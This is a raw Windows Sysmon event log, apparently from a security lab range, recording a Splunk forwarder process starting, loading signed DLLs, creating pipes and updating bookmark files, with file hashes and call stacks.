CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057344666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057344654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x800000000000000057344649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.810{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.810{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.792{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:07.791{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:07.791{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:07.791{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:07.791{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:07.791{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:07.791{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.127{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.127{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6AE78B80EAEF19DD92B91FE863B9543,SHA256=2069F81DA4F8C6FED3AC80F9EAA43B0C70294AE99251C1403AC08D76D216CE69falsetrue 23542300x800000000000000021219380Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:07.633{AD5E2759-5433-6143-1200-00000000F101}292NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BE91800A85751772BEF8A0E199E08FFA,SHA256=1E36ECF8ADD89A5E2107834D705AA8148782B259B1771FF17936C7A9D83530E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219398Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B08-618E-03CE-08000000F101}6048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219397Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A679D0ECAE36E3D2BD9666A1BEAF4C2F,SHA256=6A8A5B01CF9DB12077004E7D16D02F809F66516BF5FB69A96B24936E9A98A017,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219396Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219395Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219394Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219393Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219392Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 